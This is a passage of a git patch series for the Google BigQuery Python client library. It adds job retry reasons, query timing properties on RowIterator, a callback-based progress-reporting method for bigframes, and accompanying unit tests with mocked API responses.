attrs==25.3.0 -certifi==2025.7.14 +certifi==2025.8.3 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index e72d2822e..e7230053c 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,4 +1,4 @@ -bigquery_magics==0.10.1 +bigquery_magics==0.10.2 db-dtypes==1.4.3 google.cloud.bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index a2f0cb44a..829f08f47 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,4 +1,4 @@ -bigquery-magics==0.10.1 +bigquery-magics==0.10.2 db-dtypes==1.4.3 google-cloud-bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 From 3deff1d963980800e8b79fa3aaf5b712d4fd5062 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 6 Aug 2025 04:50:30 -0500 Subject: [PATCH 158/202] feat: retry query jobs if `jobBackendError` or `jobInternalError` are encountered (#2256) * feat: retry query jobs if `jobBackendError` or `jobInternalError` are encountered * Update google/cloud/bigquery/retry.py --- google/cloud/bigquery/retry.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 999d0e851..8f469f2d3 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -124,6 +124,8 @@ def _should_retry_get_job_conflict(exc): "rateLimitExceeded", "backendError", "internalError", + "jobBackendError", + "jobInternalError", "jobRateLimitExceeded", ) From 0a95b24192395cc3ccf801aa9bc318999873a2bf Mon Sep 17 00:00:00 2001 From: Huan Chen <142538604+Genesis929@users.noreply.github.com> Date: Thu, 14 Aug 2025 15:28:56 -0700 Subject: [PATCH 159/202] feat: add created/started/ended properties to RowIterator. (#2260) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: add created/started/ended attribute to RowIterator. * fix annotation * links update * mypy fix * Update google/cloud/bigquery/query.py Co-authored-by: Tim SweΓ±a (Swast) * Update google/cloud/bigquery/table.py Co-authored-by: Tim SweΓ±a (Swast) * Update google/cloud/bigquery/table.py Co-authored-by: Tim SweΓ±a (Swast) * Update google/cloud/bigquery/query.py Co-authored-by: Tim SweΓ±a (Swast) * Update google/cloud/bigquery/query.py Co-authored-by: Tim SweΓ±a (Swast) * Update google/cloud/bigquery/job/query.py Co-authored-by: Tim SweΓ±a (Swast) * fix unit test --------- Co-authored-by: Tim SweΓ±a (Swast) Co-authored-by: Lingqing Gan --- google/cloud/bigquery/_job_helpers.py | 3 ++ google/cloud/bigquery/client.py | 12 +++++++ google/cloud/bigquery/job/query.py | 3 ++ google/cloud/bigquery/query.py | 52 ++++++++++++++++++++++++++- google/cloud/bigquery/table.py | 31 +++++++++++++++- tests/unit/job/test_query.py | 6 ++++ tests/unit/test_client.py | 6 ++++ tests/unit/test_query.py | 48 +++++++++++++++++++++++++ 8 files changed, 159 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 73d4f6e7b..aa0b115d9 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -561,6 +561,9 @@ def do_query(): query=query, total_bytes_processed=query_results.total_bytes_processed, slot_millis=query_results.slot_millis, + created=query_results.created, + started=query_results.started, + ended=query_results.ended, ) if job_retry is not None: diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 804f77ea2..8048452db 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -4145,6 +4145,9 @@ def _list_rows_from_query_results( query: Optional[str] = None, total_bytes_processed: Optional[int] = None, slot_millis: Optional[int] = None, + created: Optional[datetime.datetime] = None, + started: Optional[datetime.datetime] = None, + ended: Optional[datetime.datetime] = None, ) -> RowIterator: """List the rows of a completed query. See @@ -4198,6 +4201,12 @@ def _list_rows_from_query_results( total bytes processed from job statistics, if present. slot_millis (Optional[int]): Number of slot ms the user is actually billed for. + created (Optional[datetime.datetime]): + Datetime at which the job was created. + started (Optional[datetime.datetime]): + Datetime at which the job was started. + ended (Optional[datetime.datetime]): + Datetime at which the job finished. Returns: google.cloud.bigquery.table.RowIterator: @@ -4238,6 +4247,9 @@ def _list_rows_from_query_results( query=query, total_bytes_processed=total_bytes_processed, slot_millis=slot_millis, + created=created, + started=started, + ended=ended, ) return row_iterator diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index ec9379ea9..44d8a92e6 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1767,6 +1767,9 @@ def is_job_done(): query=self.query, total_bytes_processed=self.total_bytes_processed, slot_millis=self.slot_millis, + created=self.created, + started=self.started, + ended=self.ended, **list_rows_kwargs, ) rows._preserve_order = _contains_order_by(self.query) diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index 4a006d621..58372f1e6 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -1287,7 +1287,7 @@ def slot_millis(self): """Total number of slot ms the user is actually billed for. See: - https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.slot_millis + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.total_slot_ms Returns: Optional[int]: Count generated on the server (None until set by the server). @@ -1310,6 +1310,56 @@ def num_dml_affected_rows(self): if num_dml_affected_rows is not None: return int(num_dml_affected_rows) + @property + def created(self): + """Creation time of this query. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.creation_time + + Returns: + Optional[datetime.datetime]: + the creation time (None until set from the server). + """ + millis = self._properties.get("creationTime") + if millis is not None: + return _helpers._datetime_from_microseconds(int(millis) * 1000.0) + + @property + def started(self): + """Start time of this query. + + This field will be present when the query transitions from the + PENDING state to either RUNNING or DONE. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.start_time + + Returns: + Optional[datetime.datetime]: + the start time (None until set from the server). + """ + millis = self._properties.get("startTime") + if millis is not None: + return _helpers._datetime_from_microseconds(int(millis) * 1000.0) + + @property + def ended(self): + """End time of this query. + + This field will be present whenever a query is in the DONE state. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.end_time + + Returns: + Optional[datetime.datetime]: + the end time (None until set from the server). + """ + millis = self._properties.get("endTime") + if millis is not None: + return _helpers._datetime_from_microseconds(int(millis) * 1000.0) + @property def rows(self): """Query results. diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index dbdde36d1..a0986c44e 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1788,7 +1788,15 @@ class RowIterator(HTTPIterator): query (Optional[str]): The query text used. total_bytes_processed (Optional[int]): - total bytes processed from job statistics, if present. + If representing query results, the total bytes processed by the associated query. + slot_millis (Optional[int]): + If representing query results, the number of slot ms billed for the associated query. + created (Optional[datetime.datetime]): + If representing query results, the creation time of the associated query. + started (Optional[datetime.datetime]): + If representing query results, the start time of the associated query. + ended (Optional[datetime.datetime]): + If representing query results, the end time of the associated query. """ def __init__( @@ -1813,6 +1821,9 @@ def __init__( query: Optional[str] = None, total_bytes_processed: Optional[int] = None, slot_millis: Optional[int] = None, + created: Optional[datetime.datetime] = None, + started: Optional[datetime.datetime] = None, + ended: Optional[datetime.datetime] = None, ): super(RowIterator, self).__init__( client, @@ -1843,6 +1854,9 @@ def __init__( self._query = query self._total_bytes_processed = total_bytes_processed self._slot_millis = slot_millis + self._job_created = created + self._job_started = started + self._job_ended = ended @property def _billing_project(self) -> Optional[str]: @@ -1905,6 +1919,21 @@ def slot_millis(self) -> Optional[int]: """Number of slot ms the user is actually billed for.""" return self._slot_millis + @property + def created(self) -> Optional[datetime.datetime]: + """If representing query results, the creation time of the associated query.""" + return self._job_created + + @property + def started(self) -> Optional[datetime.datetime]: + """If representing query results, the start time of the associated query.""" + return self._job_started + + @property + def ended(self) -> Optional[datetime.datetime]: + """If representing query results, the end time of the associated query.""" + return self._job_ended + def _is_almost_completely_cached(self): """Check if all results are completely cached. diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 7201adb55..8f684c3e9 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -889,6 +889,9 @@ def test_result_reloads_job_state_until_done(self): job_resource_done = self._make_resource(started=True, ended=True, location="EU") job_resource_done["statistics"]["query"]["totalBytesProcessed"] = str(1234) job_resource_done["statistics"]["query"]["totalSlotMs"] = str(5678) + job_resource_done["statistics"]["creationTime"] = str(11) + job_resource_done["statistics"]["startTime"] = str(22) + job_resource_done["statistics"]["endTime"] = str(33) job_resource_done["configuration"]["query"]["destinationTable"] = { "projectId": "dest-project", "datasetId": "dest_dataset", @@ -971,6 +974,9 @@ def test_result_reloads_job_state_until_done(self): self.assertEqual(result.query, job.query) self.assertEqual(result.total_bytes_processed, 1234) self.assertEqual(result.slot_millis, 5678) + self.assertEqual(result.created.timestamp() * 1000, 11) + self.assertEqual(result.started.timestamp() * 1000, 22) + self.assertEqual(result.ended.timestamp() * 1000, 33) query_results_path = f"/projects/{self.PROJECT}/queries/{self.JOB_ID}" query_results_call = mock.call( diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index bb86ccc3c..c3cf33279 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -5719,6 +5719,9 @@ def test_query_and_wait_defaults(self): "queryId": "job_abcDEF_", "totalBytesProcessed": 1234, "totalSlotMs": 5678, + "creationTime": "1437767599006", + "startTime": "1437767600007", + "endTime": "1437767601008", } creds = _make_credentials() http = object() @@ -5737,6 +5740,9 @@ def test_query_and_wait_defaults(self): self.assertEqual(rows.query, query) self.assertEqual(rows.total_bytes_processed, 1234) self.assertEqual(rows.slot_millis, 5678) + self.assertEqual(rows.created.timestamp() * 1000, 1437767599006) + self.assertEqual(rows.started.timestamp() * 1000, 1437767600007) + self.assertEqual(rows.ended.timestamp() * 1000, 1437767601008) # Verify the request we send is to jobs.query. conn.api_request.assert_called_once() diff --git a/tests/unit/test_query.py b/tests/unit/test_query.py index 2b704d3c9..adb43bcd9 100644 --- a/tests/unit/test_query.py +++ b/tests/unit/test_query.py @@ -2016,6 +2016,54 @@ def test_slot_millis_present_string(self): query = self._make_one(resource) self.assertEqual(query.slot_millis, 123456) + def test_created_missing(self): + query = self._make_one(self._make_resource()) + self.assertIsNone(query.created) + + def test_created_present_integer(self): + resource = self._make_resource() + resource["creationTime"] = 1437767599006 + query = self._make_one(resource) + self.assertEqual(query.created.timestamp() * 1000, 1437767599006) + + def test_created_present_string(self): + resource = self._make_resource() + resource["creationTime"] = "1437767599006" + query = self._make_one(resource) + self.assertEqual(query.created.timestamp() * 1000, 1437767599006) + + def test_started_missing(self): + query = self._make_one(self._make_resource()) + self.assertIsNone(query.started) + + def test_started_present_integer(self): + resource = self._make_resource() + resource["startTime"] = 1437767599006 + query = self._make_one(resource) + self.assertEqual(query.started.timestamp() * 1000, 1437767599006) + + def test_started_present_string(self): + resource = self._make_resource() + resource["startTime"] = "1437767599006" + query = self._make_one(resource) + self.assertEqual(query.started.timestamp() * 1000, 1437767599006) + + def test_ended_missing(self): + query = self._make_one(self._make_resource()) + self.assertIsNone(query.ended) + + def test_ended_present_integer(self): + resource = self._make_resource() + resource["endTime"] = 1437767599006 + query = self._make_one(resource) + self.assertEqual(query.ended.timestamp() * 1000, 1437767599006) + + def test_ended_present_string(self): + resource = self._make_resource() + resource["endTime"] = "1437767599006" + query = self._make_one(resource) + self.assertEqual(query.ended.timestamp() * 1000, 1437767599006) + def test_num_dml_affected_rows_missing(self): query = self._make_one(self._make_resource()) self.assertIsNone(query.num_dml_affected_rows) From 6659355a57f9393772fb315ec0387ab09630c18a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 18 Aug 2025 10:39:54 -0500 Subject: [PATCH 160/202] chore: add private `_query_and_wait_bigframes` method (#2250) * chore: add private `_query_and_wait_bigframes` method Towards internal issue b/409104302 * fix unit tests * revert type hints * lint * Apply suggestions from code review Co-authored-by: Chalmer Lowe * populate created, started, ended --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/_job_helpers.py | 161 +++++++++- google/cloud/bigquery/client.py | 40 ++- google/cloud/bigquery/job/query.py | 6 + google/cloud/bigquery/query.py | 9 +- google/cloud/bigquery/table.py | 3 +- tests/unit/test_client_bigframes.py | 411 ++++++++++++++++++++++++++ 6 files changed, 619 insertions(+), 11 deletions(-) create mode 100644 tests/unit/test_client_bigframes.py diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index aa0b115d9..6fd561f8c 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -35,17 +35,22 @@ predicates where it is safe to generate a new query ID. """ +from __future__ import annotations + import copy +import dataclasses +import datetime import functools import uuid import textwrap -from typing import Any, Dict, Optional, TYPE_CHECKING, Union +from typing import Any, Callable, Dict, Optional, TYPE_CHECKING, Union import warnings import google.api_core.exceptions as core_exceptions from google.api_core import retry as retries from google.cloud.bigquery import job +import google.cloud.bigquery.job.query import google.cloud.bigquery.query from google.cloud.bigquery import table import google.cloud.bigquery.retry @@ -116,14 +121,21 @@ def query_jobs_insert( retry: Optional[retries.Retry], timeout: Optional[float], job_retry: Optional[retries.Retry], + *, + callback: Callable = lambda _: None, ) -> job.QueryJob: """Initiate a query using jobs.insert. See: https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/insert + + Args: + callback (Callable): + A callback function used by bigframes to report query progress. """ job_id_given = job_id is not None job_id_save = job_id job_config_save = job_config + query_sent_factory = QuerySentEventFactory() def do_query(): # Make a copy now, so that original doesn't get changed by the process @@ -136,6 +148,16 @@ def do_query(): try: query_job._begin(retry=retry, timeout=timeout) + if job_config is not None and not job_config.dry_run: + callback( + query_sent_factory( + query=query, + billing_project=query_job.project, + location=query_job.location, + job_id=query_job.job_id, + request_id=None, + ) + ) except core_exceptions.Conflict as create_exc: # The thought is if someone is providing their own job IDs and they get # their job ID generation wrong, this could end up returning results for @@ -396,6 +418,7 @@ def query_and_wait( job_retry: Optional[retries.Retry], page_size: Optional[int] = None, max_results: Optional[int] = None, + callback: Callable = lambda _: None, ) -> table.RowIterator: """Run the query, wait for it to finish, and return the results. @@ -415,9 +438,8 @@ def query_and_wait( location (Optional[str]): Location where to run the job. Must match the location of the table used in the query as well as the destination table. - project (Optional[str]): - Project ID of the project of where to run the job. Defaults - to the client's project. + project (str): + Project ID of the project of where to run the job. api_timeout (Optional[float]): The number of seconds to wait for the underlying HTTP transport before using ``retry``. @@ -441,6 +463,8 @@ def query_and_wait( request. Non-positive values are ignored. max_results (Optional[int]): The maximum total number of rows from this request. + callback (Callable): + A callback function used by bigframes to report query progress. Returns: google.cloud.bigquery.table.RowIterator: @@ -479,12 +503,14 @@ def query_and_wait( retry=retry, timeout=api_timeout, job_retry=job_retry, + callback=callback, ), api_timeout=api_timeout, wait_timeout=wait_timeout, retry=retry, page_size=page_size, max_results=max_results, + callback=callback, ) path = _to_query_path(project) @@ -496,10 +522,24 @@ def query_and_wait( if client.default_job_creation_mode: request_body["jobCreationMode"] = client.default_job_creation_mode + query_sent_factory = QuerySentEventFactory() + def do_query(): - request_body["requestId"] = make_job_id() + request_id = make_job_id() + request_body["requestId"] = request_id span_attributes = {"path": path} + if "dryRun" not in request_body: + callback( + query_sent_factory( + query=query, + billing_project=project, + location=location, + job_id=None, + request_id=request_id, + ) + ) + # For easier testing, handle the retries ourselves. if retry is not None: response = retry(client._call_api)( @@ -542,8 +582,25 @@ def do_query(): retry=retry, page_size=page_size, max_results=max_results, + callback=callback, ) + if "dryRun" not in request_body: + callback( + QueryFinishedEvent( + billing_project=project, + location=query_results.location, + query_id=query_results.query_id, + job_id=query_results.job_id, + total_rows=query_results.total_rows, + total_bytes_processed=query_results.total_bytes_processed, + slot_millis=query_results.slot_millis, + destination=None, + created=query_results.created, + started=query_results.started, + ended=query_results.ended, + ) + ) return table.RowIterator( client=client, api_request=functools.partial(client._call_api, retry, timeout=api_timeout), @@ -614,6 +671,8 @@ def _wait_or_cancel( retry: Optional[retries.Retry], page_size: Optional[int], max_results: Optional[int], + *, + callback: Callable = lambda _: None, ) -> table.RowIterator: """Wait for a job to complete and return the results. @@ -621,12 +680,43 @@ def _wait_or_cancel( the job. """ try: - return job.result( + if not job.dry_run: + callback( + QueryReceivedEvent( + billing_project=job.project, + location=job.location, + job_id=job.job_id, + statement_type=job.statement_type, + state=job.state, + query_plan=job.query_plan, + created=job.created, + started=job.started, + ended=job.ended, + ) + ) + query_results = job.result( page_size=page_size, max_results=max_results, retry=retry, timeout=wait_timeout, ) + if not job.dry_run: + callback( + QueryFinishedEvent( + billing_project=job.project, + location=query_results.location, + query_id=query_results.query_id, + job_id=query_results.job_id, + total_rows=query_results.total_rows, + total_bytes_processed=query_results.total_bytes_processed, + slot_millis=query_results.slot_millis, + destination=job.destination, + created=job.created, + started=job.started, + ended=job.ended, + ) + ) + return query_results except Exception: # Attempt to cancel the job since we can't return the results. try: @@ -635,3 +725,62 @@ def _wait_or_cancel( # Don't eat the original exception if cancel fails. pass raise + + +@dataclasses.dataclass(frozen=True) +class QueryFinishedEvent: + """Query finished successfully.""" + + billing_project: Optional[str] + location: Optional[str] + query_id: Optional[str] + job_id: Optional[str] + destination: Optional[table.TableReference] + total_rows: Optional[int] + total_bytes_processed: Optional[int] + slot_millis: Optional[int] + created: Optional[datetime.datetime] + started: Optional[datetime.datetime] + ended: Optional[datetime.datetime] + + +@dataclasses.dataclass(frozen=True) +class QueryReceivedEvent: + """Query received and acknowledged by the BigQuery API.""" + + billing_project: Optional[str] + location: Optional[str] + job_id: Optional[str] + statement_type: Optional[str] + state: Optional[str] + query_plan: Optional[list[google.cloud.bigquery.job.query.QueryPlanEntry]] + created: Optional[datetime.datetime] + started: Optional[datetime.datetime] + ended: Optional[datetime.datetime] + + +@dataclasses.dataclass(frozen=True) +class QuerySentEvent: + """Query sent to BigQuery.""" + + query: str + billing_project: Optional[str] + location: Optional[str] + job_id: Optional[str] + request_id: Optional[str] + + +class QueryRetryEvent(QuerySentEvent): + """Query sent another time because the previous attempt failed.""" + + +class QuerySentEventFactory: + """Creates a QuerySentEvent first, then QueryRetryEvent after that.""" + + def __init__(self): + self._event_constructor = QuerySentEvent + + def __call__(self, **kwargs): + result = self._event_constructor(**kwargs) + self._event_constructor = QueryRetryEvent + return result diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 8048452db..4ca2cb428 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -15,6 +15,7 @@ """Client for interacting with the Google BigQuery API.""" from __future__ import absolute_import +from __future__ import annotations from __future__ import division from collections import abc as collections_abc @@ -31,6 +32,7 @@ import typing from typing import ( Any, + Callable, Dict, IO, Iterable, @@ -3633,8 +3635,8 @@ def query_and_wait( rate-limit-exceeded errors. Passing ``None`` disables job retry. Not all jobs can be retried. page_size (Optional[int]): - The maximum number of rows in each page of results from this - request. Non-positive values are ignored. + The maximum number of rows in each page of results from the + initial jobs.query request. Non-positive values are ignored. max_results (Optional[int]): The maximum total number of rows from this request. @@ -3656,6 +3658,39 @@ def query_and_wait( :class:`~google.cloud.bigquery.job.QueryJobConfig` class. """ + return self._query_and_wait_bigframes( + query, + job_config=job_config, + location=location, + project=project, + api_timeout=api_timeout, + wait_timeout=wait_timeout, + retry=retry, + job_retry=job_retry, + page_size=page_size, + max_results=max_results, + ) + + def _query_and_wait_bigframes( + self, + query, + *, + job_config: Optional[QueryJobConfig] = None, + location: Optional[str] = None, + project: Optional[str] = None, + api_timeout: TimeoutType = DEFAULT_TIMEOUT, + wait_timeout: Union[Optional[float], object] = POLLING_DEFAULT_VALUE, + retry: retries.Retry = DEFAULT_RETRY, + job_retry: retries.Retry = DEFAULT_JOB_RETRY, + page_size: Optional[int] = None, + max_results: Optional[int] = None, + callback: Callable = lambda _: None, + ) -> RowIterator: + """See query_and_wait. + + This method has an extra callback parameter, which is used by bigframes + to create better progress bars. + """ if project is None: project = self.project @@ -3681,6 +3716,7 @@ def query_and_wait( job_retry=job_retry, page_size=page_size, max_results=max_results, + callback=callback, ) def insert_rows( diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 44d8a92e6..b377f979d 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1550,6 +1550,8 @@ def result( # type: ignore # (incompatible with supertype) return _EmptyRowIterator( project=self.project, location=self.location, + schema=self.schema, + total_bytes_processed=self.total_bytes_processed, # Intentionally omit job_id and query_id since this doesn't # actually correspond to a finished query job. ) @@ -1737,7 +1739,11 @@ def is_job_done(): project=self.project, job_id=self.job_id, query_id=self.query_id, + schema=self.schema, num_dml_affected_rows=self._query_results.num_dml_affected_rows, + query=self.query, + total_bytes_processed=self.total_bytes_processed, + slot_millis=self.slot_millis, ) # We know that there's at least 1 row, so only treat the response from diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index 58372f1e6..7f70f6a2a 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -1228,11 +1228,18 @@ def location(self): See: https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.job_reference + or https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.location Returns: str: Job ID of the query job. """ - return self._properties.get("jobReference", {}).get("location") + location = self._properties.get("jobReference", {}).get("location") + + # Sometimes there's no job, but we still want to get the location + # information. Prefer the value from job for backwards compatibilitity. + if not location: + location = self._properties.get("location") + return location @property def query_id(self) -> Optional[str]: diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index a0986c44e..219b31467 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1837,7 +1837,7 @@ def __init__( page_start=_rows_page_start, next_token="pageToken", ) - schema = _to_schema_fields(schema) + schema = _to_schema_fields(schema) if schema else () self._field_to_index = _helpers._field_to_index_mapping(schema) self._page_size = page_size self._preserve_order = False @@ -2917,7 +2917,6 @@ class _EmptyRowIterator(RowIterator): statements. """ - schema = () pages = () total_rows = 0 diff --git a/tests/unit/test_client_bigframes.py b/tests/unit/test_client_bigframes.py new file mode 100644 index 000000000..0fcc31e40 --- /dev/null +++ b/tests/unit/test_client_bigframes.py @@ -0,0 +1,411 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Tests for Client features enabling the bigframes integration.""" + +from __future__ import annotations + +import datetime +from unittest import mock + +import pytest + +import google.auth.credentials +from google.api_core import exceptions +from google.cloud import bigquery +import google.cloud.bigquery.client +from google.cloud.bigquery import _job_helpers + + +PROJECT = "test-project" +LOCATION = "test-location" + + +def make_response(body, *, status_code: int = 200): + response = mock.Mock() + type(response).status_code = mock.PropertyMock(return_value=status_code) + response.json.return_value = body + return response + + +@pytest.fixture +def client(): + """A real client object with mocked API requests.""" + credentials = mock.create_autospec( + google.auth.credentials.Credentials, instance=True + ) + http_session = mock.Mock() + return google.cloud.bigquery.client.Client( + project=PROJECT, + credentials=credentials, + _http=http_session, + location=LOCATION, + ) + + +def test_query_and_wait_bigframes_dry_run_no_callback(client): + client._http.request.side_effect = [ + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query + "location": LOCATION, + "queryId": "abcdefg", + "totalBytesProcessed": "123", + "jobComplete": True, + } + ), + ] + callback = mock.Mock() + job_config = bigquery.QueryJobConfig(dry_run=True) + response = client._query_and_wait_bigframes( + query="SELECT 1", job_config=job_config, callback=callback + ) + callback.assert_not_called() + assert response.total_bytes_processed == 123 + assert response.query_id == "abcdefg" + + +def test_query_and_wait_bigframes_callback(client): + created = datetime.datetime( + 2025, 8, 18, 10, 11, 12, 345000, tzinfo=datetime.timezone.utc + ) + started = datetime.datetime( + 2025, 8, 18, 10, 11, 13, 456000, tzinfo=datetime.timezone.utc + ) + ended = datetime.datetime( + 2025, 8, 18, 10, 11, 14, 567000, tzinfo=datetime.timezone.utc + ) + client._http.request.side_effect = [ + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query + "location": LOCATION, + "queryId": "abcdefg", + "totalRows": "100", + "totalBytesProcessed": "123", + "totalSlotMs": "987", + "jobComplete": True, + "creationTime": _to_millis(created), + "startTime": _to_millis(started), + "endTime": _to_millis(ended), + } + ), + ] + callback = mock.Mock() + client._query_and_wait_bigframes(query="SELECT 1", callback=callback) + callback.assert_has_calls( + [ + mock.call( + _job_helpers.QuerySentEvent( + query="SELECT 1", + billing_project=PROJECT, + location=LOCATION, + # No job ID, because a basic query is eligible for jobs.query. + job_id=None, + request_id=mock.ANY, + ) + ), + mock.call( + _job_helpers.QueryFinishedEvent( + billing_project=PROJECT, + location=LOCATION, + query_id="abcdefg", + total_rows=100, + total_bytes_processed=123, + slot_millis=987, + created=created, + started=started, + ended=ended, + # No job ID or destination, because a basic query is eligible for jobs.query. + job_id=None, + destination=None, + ), + ), + ] + ) + + +def _to_millis(dt: datetime.datetime) -> str: + return str( + int( + (dt - datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)) + / datetime.timedelta(milliseconds=1) + ) + ) + + +def test_query_and_wait_bigframes_with_jobs_insert_callback_empty_results(client): + client._http.request.side_effect = [ + # jobs.insert because destination table present in job_config + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/insert + # https://cloud.google.com/bigquery/docs/reference/rest/v2/Job + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "statistics": { + "creationTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ) + ), + "query": { + "statementType": "SELECT", + # "queryPlan": [{"name": "part1"}, {"name": "part2"}], + }, + }, + "status": { + "state": "PENDING", + }, + } + ), + # jobs.get waiting for query to finish + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/insert + # https://cloud.google.com/bigquery/docs/reference/rest/v2/Job + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "status": { + "state": "PENDING", + }, + } + ), + # jobs.getQueryResults with max_results=0 + make_response( + { + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "jobComplete": True, + # totalRows is intentionally missing so we end up in the _EmptyRowIterator code path. + } + ), + # jobs.get + make_response( + { + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "statistics": { + "creationTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ) + ), + "startTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 32, 123000, tzinfo=datetime.timezone.utc + ) + ), + "endTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 33, 123000, tzinfo=datetime.timezone.utc + ) + ), + "query": { + "statementType": "SELECT", + "totalBytesProcessed": 123, + "totalSlotMs": 987, + }, + }, + "status": {"state": "DONE"}, + } + ), + ] + callback = mock.Mock() + config = bigquery.QueryJobConfig() + config.destination = "proj.dset.table" + client._query_and_wait_bigframes( + query="SELECT 1", job_config=config, callback=callback + ) + callback.assert_has_calls( + [ + mock.call( + _job_helpers.QuerySentEvent( + query="SELECT 1", + billing_project="response-project", + location="response-location", + job_id="response-job-id", + # We use jobs.insert not jobs.query because destination is + # present on job_config. + request_id=None, + ) + ), + mock.call( + _job_helpers.QueryReceivedEvent( + billing_project="response-project", + location="response-location", + job_id="response-job-id", + statement_type="SELECT", + state="PENDING", + query_plan=[], + created=datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ), + started=None, + ended=None, + ) + ), + mock.call( + _job_helpers.QueryFinishedEvent( + billing_project="response-project", + location="response-location", + job_id="response-job-id", + query_id=None, + total_rows=0, + total_bytes_processed=123, + slot_millis=987, + created=datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ), + started=datetime.datetime( + 2025, 8, 13, 13, 7, 32, 123000, tzinfo=datetime.timezone.utc + ), + ended=datetime.datetime( + 2025, 8, 13, 13, 7, 33, 123000, tzinfo=datetime.timezone.utc + ), + destination=None, + ), + ), + ] + ) + + +def test_query_and_wait_bigframes_with_jobs_insert_dry_run_no_callback(client): + client._http.request.side_effect = [ + # jobs.insert because destination table present in job_config + make_response( + { + "jobReference": { + "projectId": "response-project", + "jobId": "response-job-id", + "location": "response-location", + }, + "statistics": { + "creationTime": _to_millis( + datetime.datetime( + 2025, 8, 13, 13, 7, 31, 123000, tzinfo=datetime.timezone.utc + ) + ), + 